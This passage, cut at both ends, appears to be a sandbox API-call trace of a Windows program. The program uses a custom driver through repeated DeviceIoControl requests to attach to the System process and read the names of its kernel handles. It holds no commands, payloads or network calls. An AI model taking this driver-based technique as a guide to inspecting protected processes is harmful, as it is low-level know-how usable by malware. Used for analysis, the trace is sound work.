(hObject=0xc4) returned 1 [0198.360] NtQueryObject (in: Handle=0xc8, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0198.360] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x78) returned 0x362b50 [0198.361] NtQueryObject (in: Handle=0xc8, ObjectInformationClass=0x2, ObjectInformation=0x362b50, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x362b50, ReturnLength=0x0) returned 0x0 [0198.361] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x362b50 | out: hHeap=0x320000) returned 1 [0198.361] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.361] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0198.361] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.361] PsAcquireProcessExitSynchronization () returned 0x0 [0198.361] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.361] ObReferenceObjectByHandle (in: Handle=0xffffffff80000428, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80028d63f0, HandleInformation=0x0) returned 0x0 [0198.361] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.361] PsReleaseProcessExitSynchronization () returned 0x2 [0198.361] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7b [0198.361] ObQueryNameString (in: Object=0xfffffa80028d63f0, ObjectNameInfo=0xfffffa8003082044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003082044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.361] ObfDereferenceObject (Object=0xfffffa80028d63f0) returned 0x3 [0198.361] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.362] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.362] CloseHandle (hObject=0xc8) returned 1 [0198.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0198.362] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.362] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0198.362] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.362] PsAcquireProcessExitSynchronization () returned 0x0 [0198.362] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.362] ObReferenceObjectByHandle (in: Handle=0xffffffff80000044, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80071ff050, HandleInformation=0x0) returned 0x0 [0198.362] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.363] PsReleaseProcessExitSynchronization () returned 0x2 [0198.363] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7b [0198.363] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003201044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003201044, ReturnLength=0xfffff880052b3508) returned 0x0 [0198.363] ObfDereferenceObject (Object=0xfffffa80071ff050) returned 0x1 [0198.363] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.363] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.363] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.363] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0198.363] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.363] PsAcquireProcessExitSynchronization () returned 0x0 [0198.363] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.363] ObReferenceObjectByHandle (in: Handle=0xffffffff8000004c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8006c4d050, HandleInformation=0x0) returned 0x0 [0198.363] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.363] PsReleaseProcessExitSynchronization () returned 0x2 [0198.364] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7b [0198.364] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800314e044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800314e044, ReturnLength=0xfffff880052b3508) returned 0x0 [0198.364] ObfDereferenceObject (Object=0xfffffa8006c4d050) returned 0x1 [0198.364] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.364] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.364] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.364] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0198.364] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.364] PsAcquireProcessExitSynchronization () returned 0x0 [0198.364] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.364] ObReferenceObjectByHandle (in: Handle=0xffffffff80000050, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80071c6f20, HandleInformation=0x0) returned 0x0 [0198.364] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.364] PsReleaseProcessExitSynchronization () returned 0x2 [0198.364] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7b [0198.364] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307e044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800307e044, ReturnLength=0xfffff880052b3508) returned 0x0 [0198.365] ObfDereferenceObject (Object=0xfffffa80071c6f20) returned 0x1 [0198.365] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.365] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.365] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.365] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0198.365] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.365] PsAcquireProcessExitSynchronization () returned 0x0 [0198.365] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.365] ObReferenceObjectByHandle (in: Handle=0xffffffff80000054, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8005df9050, HandleInformation=0x0) returned 0x0 [0198.365] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.365] PsReleaseProcessExitSynchronization () returned 0x2 [0198.366] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7b [0198.366] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880052b3508) returned 0x0 [0198.366] ObfDereferenceObject (Object=0xfffffa8005df9050) returned 0x1 [0198.366] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.366] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.366] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.366] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0198.366] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.366] PsAcquireProcessExitSynchronization () returned 0x0 [0198.366] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.366] ObReferenceObjectByHandle (in: Handle=0xffffffff80000058, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8005dff050, HandleInformation=0x0) returned 0x0 [0198.366] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.367] PsReleaseProcessExitSynchronization () returned 0x2 [0198.367] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7b [0198.367] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307c044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800307c044, ReturnLength=0xfffff880052b3508) returned 0x0 [0198.367] ObfDereferenceObject (Object=0xfffffa8005dff050) returned 0x1 [0198.367] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.367] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.367] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.367] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0198.367] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.368] PsAcquireProcessExitSynchronization () returned 0x0 [0198.368] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.368] ObReferenceObjectByHandle (in: Handle=0xffffffff8000005c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80059fd1f0, HandleInformation=0x0) returned 0x0 [0198.368] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.368] PsReleaseProcessExitSynchronization () returned 0x2 [0198.368] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7b [0198.368] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003088044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003088044, ReturnLength=0xfffff880052b3508) returned 0x0 [0198.368] ObfDereferenceObject (Object=0xfffffa80059fd1f0) returned 0x1 [0198.368] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.368] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.368] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.368] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0198.369] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.369] PsAcquireProcessExitSynchronization () returned 0x0 [0198.369] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.369] ObReferenceObjectByHandle (in: Handle=0xffffffff80000060, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80053b7050, HandleInformation=0x0) returned 0x0 [0198.369] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.369] PsReleaseProcessExitSynchronization () returned 0x2 [0198.369] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7b [0198.369] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880052b3508) returned 0x0 [0198.369] ObfDereferenceObject (Object=0xfffffa80053b7050) returned 0x1 [0198.369] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.369] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.369] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.369] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0198.369] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.370] PsAcquireProcessExitSynchronization () returned 0x0 [0198.370] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.370] ObReferenceObjectByHandle (in: Handle=0xffffffff80000064, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80029f3850, HandleInformation=0x0) returned 0x0 [0198.370] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.370] PsReleaseProcessExitSynchronization () returned 0x2 [0198.370] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7b [0198.370] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800312e044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800312e044, ReturnLength=0xfffff880052b3508) returned 0x0 [0198.370] ObfDereferenceObject (Object=0xfffffa80029f3850) returned 0x1 [0198.370] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.370] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.370] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.370] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0198.370] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.370] PsAcquireProcessExitSynchronization () returned 0x0 [0198.370] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.371] ObReferenceObjectByHandle (in: Handle=0xffffffff80000068, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8004bdf050, HandleInformation=0x0) returned 0x0 [0198.371] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.371] PsReleaseProcessExitSynchronization () returned 0x2 [0198.371] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7b [0198.371] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880052b3508) returned 0x0 [0198.371] ObfDereferenceObject (Object=0xfffffa8004bdf050) returned 0x1 [0198.371] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.371] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.371] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.371] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0198.371] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.371] PsAcquireProcessExitSynchronization () returned 0x0 [0198.371] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.371] ObReferenceObjectByHandle (in: Handle=0xffffffff8000006c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003e71050, HandleInformation=0x0) returned 0x0 [0198.372] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.372] PsReleaseProcessExitSynchronization () returned 0x2 [0198.372] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7b [0198.372] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003131044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003131044, ReturnLength=0xfffff880052b3508) returned 0x0 [0198.372] ObfDereferenceObject (Object=0xfffffa8003e71050) returned 0x1 [0198.372] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.372] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.372] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.372] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0198.372] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.372] PsAcquireProcessExitSynchronization () returned 0x0 [0198.372] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.373] ObReferenceObjectByHandle (in: Handle=0xffffffff80000070, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80045a7c90, HandleInformation=0x0) returned 0x0 [0198.373] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.373] PsReleaseProcessExitSynchronization () returned 0x2 [0198.373] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7b [0198.373] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3508) returned 0x0 [0198.373] ObfDereferenceObject (Object=0xfffffa80045a7c90) returned 0x1 [0198.373] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.373] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.373] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.373] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0198.373] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.373] PsAcquireProcessExitSynchronization () returned 0x0 [0198.374] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.374] ObReferenceObjectByHandle (in: Handle=0xffffffff80000074, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003d963e0, HandleInformation=0x0) returned 0x0 [0198.374] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.374] PsReleaseProcessExitSynchronization () returned 0x2 [0198.374] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7b [0198.374] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800313e044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800313e044, ReturnLength=0xfffff880052b3508) returned 0x0 [0198.374] ObfDereferenceObject (Object=0xfffffa8003d963e0) returned 0x1 [0198.374] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.374] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.374] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.375] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0198.375] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.375] PsAcquireProcessExitSynchronization () returned 0x0 [0198.375] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.375] ObReferenceObjectByHandle (in: Handle=0xffffffff80000078, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80045a7f20, HandleInformation=0x0) returned 0x0 [0198.375] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.375] PsReleaseProcessExitSynchronization () returned 0x2 [0198.375] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7b [0198.375] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003144044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003144044, ReturnLength=0xfffff880052b3508) returned 0x0 [0198.375] ObfDereferenceObject (Object=0xfffffa80045a7f20) returned 0x1 [0198.375] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.375] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.376] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.376] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0198.376] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.376] PsAcquireProcessExitSynchronization () returned 0x0 [0198.376] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.376] ObReferenceObjectByHandle (in: Handle=0xffffffff8000007c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80029f2d30, HandleInformation=0x0) returned 0x0 [0198.376] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.376] PsReleaseProcessExitSynchronization () returned 0x2 [0198.376] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7b [0198.376] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003147044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003147044, 